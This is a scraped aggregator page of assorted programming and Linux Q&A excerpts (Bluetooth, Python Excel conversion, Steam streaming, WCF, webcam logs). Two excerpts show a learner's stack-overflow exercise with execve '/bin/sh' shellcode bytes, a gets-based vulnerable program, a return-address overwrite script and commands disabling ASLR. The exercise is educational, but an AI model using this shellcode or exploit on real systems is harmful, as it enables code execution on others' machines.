data.\n"); } input.close(); } catch(IOException ioEx) { ioEx.printStackTrace(); } } }

    Read the article

  • Bluetooth refuses to connect since update to Ubuntu Gnome 13.10

    - by Niklas Berg
    I can no longer connect to my bluetooth speakers since since upgrading to Ubuntu Gnome 13.10 and then Gnome shell to 3.10, which never were a problem with Ubuntu Gnome 13.04. My bluetooth-dongle seems to working fine and I can even detect and add the speakers (Creative D100) but when I try to slide the button from off to on in the bluetooth settings it just slides back to off. The "bluetooth-B" in the upper right corner is also gone. I actually managed to connect after I added "Enable=Socket" under "[general]" /etc/bluetooth/audio.conf and the indicator on the speakers confirms the connection, but I cannot find the speakers in the audio settings even then. I've tried to solve this for several days, reading tons of other possibly related questions here on ask ubuntu and elsewhere but am unable to find a solution. Any ideas?

    Read the article

  • Convert text files to excel files using python

    - by Rahim Jaafar
    I am working on INFORMIX 4GL programs. That programs produce output text files.This is an example of the output: Lot No|Purchaser name|Billing|Payment|Deposit|Balance| J1006|JAUHARI BIN HAMIDI|5285.05|4923.25|0.00|361.80| J1007|LEE, CHIA-JUI AKA LEE, ANDREW J. R.|5366.15|5313.70|0.00|52.45| J1008|NAZRIN ANEEZA BINTI NAZARUDDIN|5669.55|5365.30|0.00|304.25| J1009|YAZID LUTFI BIN AHMAD LUTFI|3180.05|3022.30|0.00|157.75| This text files can manually convert to excel files.But, I wanna ask, is there any script that I can use to convert .txt files to .xls files ? Hi all,now I'm already can convert text files to excell file by python using script that was given from user named Rami Helmy.A big thanks for him.But now,That script will produce more than one excell files depends on the number of '|' from the text files.Beside that,That script also can only convert one text files.I a going to convert all text files without state the name of text files.Therefore,I am looking such a way on how to this script going to: output only one excell file convert all .txt files from the directory that was given from user. output excell's file name are automaticly copied from the file name of text files. I am new in python,hopefully someone can help me to solve my problems.Thank You.. done all the task,but there was something that I'm confused.. that output excell files contains an "square" symbol like this: then, how can I ensure that there is no square symbol like that after I convert from text files to excell? thank you...

    Read the article

  • Shellcode for a simple stack overflow: Exploited program with shell terminates directly after execve

    - by henning
    Hi, I played around with buffer overflows on Linux (amd64) and tried exploiting a simple program, but it failed. I disabled the security features (address space layout randomization with sysctl -w kernel.randomize_va_space=0 and nx bit in the bios). It jumps to the stack and executes the shellcode, but it doesn't start a shell. The execve syscall succeeds but afterwards it just terminates. Any idea what's wrong? Running the shellcode standalone works just fine. Bonus question: Why do I need to set rax to zero before calling printf? (See comment in the code) Vulnerable file buffer.s: .data .fmtsp: .string "Stackpointer %p\n" .fmtjump: .string "Jump to %p\n" .text .global main main: push %rbp mov %rsp, %rbp sub $120, %rsp # calling printf without setting rax # to zero results in a segfault. why? xor %rax, %rax mov %rsp, %rsi mov $.fmtsp, %rdi call printf mov %rsp, %rdi call gets xor %rax, %rax mov $.fmtjump, %rdi mov 8(%rbp), %rsi call printf xor %rax, %rax leave ret shellcode.s .text .global main main: mov $0x68732f6e69622fff, %rbx shr $0x8, %rbx push %rbx mov %rsp, %rdi xor %rsi, %rsi xor %rdx, %rdx xor %rax, %rax add $0x3b, %rax syscall exploit.py shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05" stackpointer = "\x7f\xff\xff\xff\xe3\x28" output = shellcode output += 'a' * (120 - len(shellcode)) # fill buffer output += 'b' * 8 # override stored base pointer output += ''.join(reversed(stackpointer)) print output Compiled with: $ gcc -o buffer buffer.s $ gcc -o shellcode shellcode.s Started with: $ python exploit.py | ./buffer Stackpointer 0x7fffffffe328 Jump to 0x7fffffffe328 Debugging with gdb: $ python exploit.py > exploit.txt (Note: corrected stackpointer address in exploit.py for gdb) $ gdb buffer (gdb) run < exploit.txt Starting program: /home/henning/bo/buffer < exploit.txt Stackpointer 0x7fffffffe308 Jump to 0x7fffffffe308 process 4185 is executing new program: /bin/dash Program exited normally.

    Read the article

  • How to Use Steam In-Home Streaming

    - by Chris Hoffman
    Steam’s In-Home Streaming is now available to everyone, allowing you to stream PC games from one PC to another PC on the same local network. Use your gaming PC to power your laptops and home theater system. This feature doesn’t allow you to stream games over the Internet, only the same local network. Even if you tricked Steam, you probably wouldn’t get good streaming performance over the Internet. Why Stream? When you use Steam In-Home streaming, one PC sends its video and audio to another PC. The other PC views the video and audio like it’s watching a movie, sending back mouse, keyboard, and controller input to the other PC. This allows you to have a fast gaming PC power your gaming experience on slower PCs. For example, you could play graphically demanding games on a laptop in another room of your house, even if that laptop has slower integrated graphics. You could connect a slower PC to your television and use your gaming PC without hauling it into a different room in your house. Streaming also enables cross-platform compatibility. You could have a Windows gaming PC and stream games to a Mac or Linux system. This will be Valve’s official solution for compatibility with old Windows-only games on the Linux (Steam OS) Steam Machines arriving later this year. NVIDIA offers their own game streaming solution, but it requires certain NVIDIA graphics hardware and can only stream to an NVIDIA Shield device. How to Get Started In-Home Streaming is simple to use and doesn’t require any complex configuration — or any configuration, really. First, log into the Steam program on a Windows PC. This should ideally be a powerful gaming PC with a powerful CPU and fast graphics hardware. Install the games you want to stream if you haven’t already — you’ll be streaming from your PC, not from Valve’s servers. (Valve will eventually allow you to stream games from Mac OS X, Linux, and Steam OS systems, but that feature isn’t yet available. You can still stream games to these other operating systems.) Next, log into Steam on another computer on the same network with the same Steam username. Both computers have to be on the same subnet of the same local network. You’ll see the games installed on your other PC in the Steam client’s library. Click the Stream button to start streaming a game from your other PC. The game will launch on your host PC, and it will send its audio and video to the PC in front of you. Your input on the client will be sent back to the server. Be sure to update Steam on both computers if you don’t see this feature. Use the Steam > Check for Updates option within Steam and install the latest update. Updating to the latest graphics drivers for your computer’s hardware is always a good idea, too. Improving Performance Here’s what Valve recommends for good streaming performance: Host PC: A quad-core CPU for the computer running the game, minimum. The computer needs enough processor power to run the game, compress the video and audio, and send it over the network with low latency. Streaming Client: A GPU that supports hardware-accelerated H.264 decoding on the client PC. This hardware is included on all recent laptops and PCs. Ifyou have an older PC or netbook, it may not be able to decode the video stream quickly enough. Network Hardware: A wired network connection is ideal. You may have success with wireless N or AC networks with good signals, but this isn’t guaranteed. Game Settings: While streaming a game, visit the game’s setting screen and lower the resolution or turn off VSync to speed things up. In-Home Steaming Settings: On the host PC, click Steam > Settings and select In-Home Streaming to view the In-Home Streaming settings. You can modify your streaming settings to improve performance and reduce latency. Feel free to experiment with the options here and see how they affect performance — they should be self-explanatory. Check Valve’s In-Home Streaming documentation for troubleshooting information. You can also try streaming non-Steam games. Click Games > Add a Non-Steam Game to My Library on your host PC and add a PC game you have installed elsewhere on your system. You can then try streaming it from your client PC. Valve says this “may work but is not officially supported.” Image Credit: Robert Couse-Baker on Flickr, Milestoned on Flickr

    Read the article

  • WCF Method is returning xml fragment but no xml UTF-8 header

    - by horls
    My method does not return the header, just the root element xml. internal Message CreateReturnMessage(string output, string contentType) { // create dictionaryReader for the Message byte[] resultBytes = Encoding.UTF8.GetBytes(output); XmlDictionaryReader xdr = XmlDictionaryReader.CreateTextReader(resultBytes, 0, resultBytes.Length, Encoding.UTF8, XmlDictionaryReaderQuotas.Max, null); if (WebOperationContext.Current != null) WebOperationContext.Current.OutgoingResponse.ContentType = contentType; // create Message return Message.CreateMessage(MessageVersion.None, "", xdr); } However, the output I get is: <Test> <Message>Hello World!</Message> </Test> I would like the output to render as: <?xml version="1.0" encoding="utf-8" standalone="yes"?> <Test> <Message>Hello World!</Message> </Test>

    Read the article

  • Shellcode for a simple stack overflow doesn't start a shell

    - by henning
    Hi, I played around with buffer overflows on Linux (amd64) and tried exploiting a simple program, but it failed. I disabled the security features (address space layout randomization with sysctl -w kernel.randomize_va_space=0 and nx bit in the bios). It jumps to the stack and executes the shellcode, but it doesn't start a shell. Seems like the execve syscall fails. Any idea what's wrong? Running the shellcode standalone works just fine. Bonus question: Why do I need to set rax to zero before calling printf? (See comment in the code) Vulnerable file buffer.s: .data .fmtsp: .string "Stackpointer %p\n" .fmtjump: .string "Jump to %p\n" .text .global main main: push %rbp mov %rsp, %rbp sub $120, %rsp # calling printf without setting rax # to zero results in a segfault. why? xor %rax, %rax mov %rsp, %rsi mov $.fmtsp, %rdi call printf mov %rsp, %rdi call gets xor %rax, %rax mov $.fmtjump, %rdi mov 8(%rbp), %rsi call printf xor %rax, %rax leave ret shellcode.s .text .global main main: mov $0x68732f6e69622fff, %rbx shr $0x8, %rbx push %rbx mov %rsp, %rdi xor %rsi, %rsi xor %rdx, %rdx xor %rax, %rax add $0x3b, %rax syscall exploit.py shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05" stackpointer = "\x7f\xff\xff\xff\xe3\x28" output = shellcode output += 'a' * (120 - len(shellcode)) # fill buffer output += 'b' * 8 # override stored base pointer output += ''.join(reversed(stackpointer)) print output Compiled with: $ gcc -o buffer buffer.s $ gcc -o shellcode shellcode.s Started with: $ python exploit.py | ./buffer Stackpointer 0x7fffffffe328 Jump to 0x7fffffffe328

    Read the article

  • Dependency Property not getting updated value via ActivityBind

    - by d h
    I have a Sequence Activity which holds two activities (Activity A and B), the input dependency property for Activity B is bound an output dependency property of Activity A. However, when I run the sequence activity, the Input for activity B is never updated and just uses the default value of activity A's output. My question is: is there a way to enforce an update on activity B's input so that it gets the latest value of activity A's output?

    Read the article

  • Can't display multi byte string on MonoDevelop Mac OS X

    - by wataradio
    The problem is following one line code: Console.WriteLine ("?"); This results in the following output in Application Output window: ? How can I display "?" instead of "?" in Application Output window. I made sure following things: The source code encoding is UTF-8 I selected Japanese font set "Osaka Regular-Mono" (Preferences General Font) Executing the exe from a terminal, "?" is displayed correctly on terminal window On Ubuntu's MonoDevelop, "?" is displayed correctly in Application Output window Environments: MonoDevelop 2.2.2 Mono 2.6.4 Mac OS X 10.6.3

    Read the article

  • Week in Geek: New Malware Steals Bitcoin Currency

    - by Asian Angel
    This week we learned how to easily change a dual-booting PC’s default OS, “extract audio from any video using VLC, sneak around paywalls, & delay Windows Live Mesh during boot”, shrink videos to fit an Android phone with VLC, fix damaged or broken audio cables, “decide between an ISO or TS folder, help Windows 7 remember folder locations, & convert books for the Kindle”, and more. Photo by Profound Whatever.How to Make and Install an Electric Outlet in a Cabinet or DeskHow To Recover After Your Email Password Is CompromisedHow to Clean Your Filthy Keyboard in the Dishwasher (Without Ruining it)

    Read the article

  • Overload Anonymous Functions

    - by Nissan Fan
    Still wrapping my head around Delegates and I'm curious: Is it possible to overload anonymous functions? Such that: delegate void Output(string x, int y); Supports: Output show = (x, y) => Console.WriteLine("{0}: {1}", x.ToString(), y.ToString()); And: delegate void Output(string x, string y); Allowing: show( "ABC", "EFG" ); And: show( "ABC", 123 );

    Read the article

  • using isight camera in macbookpro(8,2) on ubuntu 12.04 virtualbox VM

    - by Kurt Spindler
    I'm having a lot of trouble using the built-in isight camera on my macbookpro8,2 (early 2011) from an ubuntu 12.04 virtual machine, run inside VirtualBox. The following is the log I get when I try to run guvcview ubuntu@ubuntu:~$ guvcview guvcview 1.5.3 ALSA lib pcm.c:2217:(snd_pcm_open_noupdate) Unknown PCM cards.pcm.rear ALSA lib pcm.c:2217:(snd_pcm_open_noupdate) Unknown PCM cards.pcm.center_lfe ALSA lib pcm.c:2217:(snd_pcm_open_noupdate) Unknown PCM cards.pcm.side ALSA lib pcm.c:2217:(snd_pcm_open_noupdate) Unknown PCM cards.pcm.surround71 ALSA lib setup.c:565:(add_elem) Cannot obtain info for CTL elem (MIXER,'IEC958 Playback Default',0,0,0): No such file or directory ALSA lib setup.c:565:(add_elem) Cannot obtain info for CTL elem (MIXER,'IEC958 Playback Default',0,0,0): No such file or directory ALSA lib setup.c:565:(add_elem) Cannot obtain info for CTL elem (MIXER,'IEC958 Playback Default',0,0,0): No such file or directory ALSA lib pcm.c:2217:(snd_pcm_open_noupdate) Unknown PCM cards.pcm.hdmi ALSA lib pcm.c:2217:(snd_pcm_open_noupdate) Unknown PCM cards.pcm.hdmi ALSA lib pcm.c:2217:(snd_pcm_open_noupdate) Unknown PCM cards.pcm.modem ALSA lib pcm.c:2217:(snd_pcm_open_noupdate) Unknown PCM cards.pcm.modem ALSA lib pcm.c:2217:(snd_pcm_open_noupdate) Unknown PCM cards.pcm.phoneline ALSA lib pcm.c:2217:(snd_pcm_open_noupdate) Unknown PCM cards.pcm.phoneline ALSA lib audio/pcm_bluetooth.c:1614:(audioservice_expect) BT_GET_CAPABILITIES failed : Input/output error(5) ALSA lib audio/pcm_bluetooth.c:1614:(audioservice_expect) BT_GET_CAPABILITIES failed : Input/output error(5) ALSA lib audio/pcm_bluetooth.c:1614:(audioservice_expect) BT_GET_CAPABILITIES failed : Input/output error(5) ALSA lib audio/pcm_bluetooth.c:1614:(audioservice_expect) BT_GET_CAPABILITIES failed : Input/output error(5) ALSA lib pcm_dmix.c:957:(snd_pcm_dmix_open) The dmix plugin supports only playback stream Cannot connect to server socket err = No such file or directory Cannot connect to server socket jack server is not running or cannot be started video device: /dev/video0 Init. FaceTime HD Camera (Built-in) (location: usb-0000:00:0b.0-1) { pixelformat = 'YUYV', description = 'YUV 4:2:2 (YUYV)' } { discrete: width = 160, height = 120 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 176, height = 144 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 320, height = 240 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 352, height = 288 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 640, height = 480 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 1280, height = 720 } Time interval between frame: 1/10, { pixelformat = 'MJPG', description = 'MJPEG' } { discrete: width = 960, height = 540 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 1024, height = 576 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 1280, height = 720 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { pixelformat = 'RGB3', description = 'RGB3' } { discrete: width = 160, height = 120 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 176, height = 144 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 320, height = 240 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 352, height = 288 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 640, height = 480 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 1280, height = 720 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 960, height = 540 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 1024, height = 576 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { pixelformat = 'BGR3', description = 'BGR3' } { discrete: width = 160, height = 120 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 176, height = 144 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 320, height = 240 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 352, height = 288 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 640, height = 480 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 1280, height = 720 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 960, height = 540 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 1024, height = 576 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { pixelformat = 'YU12', description = 'YU12' } { discrete: width = 160, height = 120 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 176, height = 144 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 320, height = 240 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 352, height = 288 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 640, height = 480 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 1280, height = 720 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 960, height = 540 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 1024, height = 576 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { pixelformat = 'YV12', description = 'YV12' } { discrete: width = 160, height = 120 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 176, height = 144 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 320, height = 240 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 352, height = 288 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 640, height = 480 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 1280, height = 720 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 960, height = 540 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, { discrete: width = 1024, height = 576 } Time interval between frame: 100/2997, 1/25, 1/24, 1/15, vid:05ac pid:8509 driver:uvcvideo checking format: 1196444237 VIDIOC_G_COMP:: Invalid argument compression control not supported fps is set to 1/25 drawing controls no codec detected for H264 no codec detected for MP3 - (lavc) Checking video mode 960x540@32bpp : OK Could not grab image (select timeout): Resource temporarily unavailable Could not grab image (select timeout): Resource temporarily unavailable Could not grab image (select timeout): Resource temporarily unavailable Could not grab image (select timeout): Resource temporarily unavailable Could not grab image (select timeout): Resource temporarily unavailable Could not grab image (select timeout): Resource temporarily unavailable Could not grab image (select timeout): Resource temporarily unavailable Could not grab image (select timeout): Resource temporarily unavailable Could not grab image (select timeout): Resource temporarily unavailable write /home/ubuntu/.guvcviewrc OK free controls cleaned allocations - 100% Closing portaudio ...OK Closing GTK... OK ubuntu@ubuntu:~$ Any help would be greatly appreciated. Only clue I have is that I initially was having problems, tried using the old method of fixing isights (involving installing isight-firmware-tools) before realizing that I just hadn't turned on the VM setting to allow the VM to access the webcam. :) Anyway, I wonder if installing that messed something up. However, I think this is a red herring because I've: shut down and turned back on the Mac, restarted the VM, tried a different VM (for which I never installed isight-firmware-tools, and created an entirely new ubuntu vm. All instances have had this problem. Similarly, other viewers, such as cheese, avplay, avconv have had all various kinds of errors.

    Read the article

  • composite-video-to-usb adaptor

    - by sawa
    I bought a composite-video-to-usb adaptor. I want to stream video game in ubuntu. How can I do that? My environment: Monoprice USB Video and Audio Grabber Ubuntu 11.04 The relevant output of lsusb: Bus 001 Device 011: ID 0572:262a Conexant Systems (Rockwell), Inc. The relevant output of sudo lshw: *-usb:0 description: USB Controller product: 82801JI (ICH10 Family) USB UHCI Controller #4 vendor: Intel Corporation physical id: 1a bus info: pci@0000:00:1a.0 version: 00 width: 32 bits clock: 33MHz capabilities: uhci bus_master cap_list configuration: driver=uhci_hcd latency=0 resources: irq:16 ioport:f0e0(size=32) *-usb:1 description: USB Controller product: 82801JI (ICH10 Family) USB UHCI Controller #5 vendor: Intel Corporation physical id: 1a.1 bus info: pci@0000:00:1a.1 version: 00 width: 32 bits clock: 33MHz capabilities: uhci bus_master cap_list configuration: driver=uhci_hcd latency=0 resources: irq:21 ioport:f0c0(size=32) *-usb:2 description: USB Controller product: 82801JI (ICH10 Family) USB UHCI Controller #6 vendor: Intel Corporation physical id: 1a.2 bus info: pci@0000:00:1a.2 version: 00 width: 32 bits clock: 33MHz capabilities: uhci bus_master cap_list configuration: driver=uhci_hcd latency=0 resources: irq:18 ioport:f0a0(size=32) *-usb:3 description: USB Controller product: 82801JI (ICH10 Family) USB2 EHCI Controller #2 vendor: Intel Corporation physical id: 1a.7 bus info: pci@0000:00:1a.7 version: 00 width: 32 bits clock: 33MHz capabilities: pm debug ehci bus_master cap_list configuration: driver=ehci_hcd latency=0 resources: irq:18 memory:e0525c00-e0525fff *-multimedia description: Audio device product: 82801JI (ICH10 Family) HD Audio Controller vendor: Intel Corporation physical id: 1b bus info: pci@0000:00:1b.0 version: 00 width: 64 bits clock: 33MHz capabilities: pm msi pciexpress bus_master cap_list configuration: driver=HDA Intel latency=0 resources: irq:43 memory:e0520000-e0523fff *-usb:4 description: USB Controller product: 82801JI (ICH10 Family) USB UHCI Controller #1 vendor: Intel Corporation physical id: 1d bus info: pci@0000:00:1d.0 version: 00 width: 32 bits clock: 33MHz capabilities: uhci bus_master cap_list configuration: driver=uhci_hcd latency=0 resources: irq:23 ioport:f080(size=32) *-usb:5 description: USB Controller product: 82801JI (ICH10 Family) USB UHCI Controller #2 vendor: Intel Corporation physical id: 1d.1 bus info: pci@0000:00:1d.1 version: 00 width: 32 bits clock: 33MHz capabilities: uhci bus_master cap_list configuration: driver=uhci_hcd latency=0 resources: irq:19 ioport:f060(size=32) *-usb:6 description: USB Controller product: 82801JI (ICH10 Family) USB UHCI Controller #3 vendor: Intel Corporation physical id: 1d.2 bus info: pci@0000:00:1d.2 version: 00 width: 32 bits clock: 33MHz capabilities: uhci bus_master cap_list configuration: driver=uhci_hcd latency=0 resources: irq:18 ioport:f040(size=32) *-usb:7 description: USB Controller product: 82801JI (ICH10 Family) USB2 EHCI Controller #1 vendor: Intel Corporation physical id: 1d.7 bus info: pci@0000:00:1d.7 version: 00 width: 32 bits clock: 33MHz capabilities: pm debug ehci bus_master cap_list configuration: driver=ehci_hcd latency=0 resources: irq:23 memory:e0525800-e0525bff The relevant output of dmesg: [18953.220035] usb 1-1: new high speed USB device using ehci_hcd and address 6 [19964.761076] Linux video capture interface: v2.00 [19964.767112] usbcore: registered new interface driver uvcvideo [19964.767115] USB Video Class driver (v1.0.0)

    Read the article

  • i want to find values between { }

    - by girish
    I m working with regular expression( Regex ) but not finding the exact output.. i want to find the values between two curly braces { Value } = value i use the following pattern but not getting the exact output...it does not remove first "{" ... string pattern = "\{*\}"; if my value is - {girish} it returns me {girish instead of this i want girish as output...

    Read the article

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

< Previous Page | 168 169 170 171 172 173 174 175 176 177 178 179  | Next Page >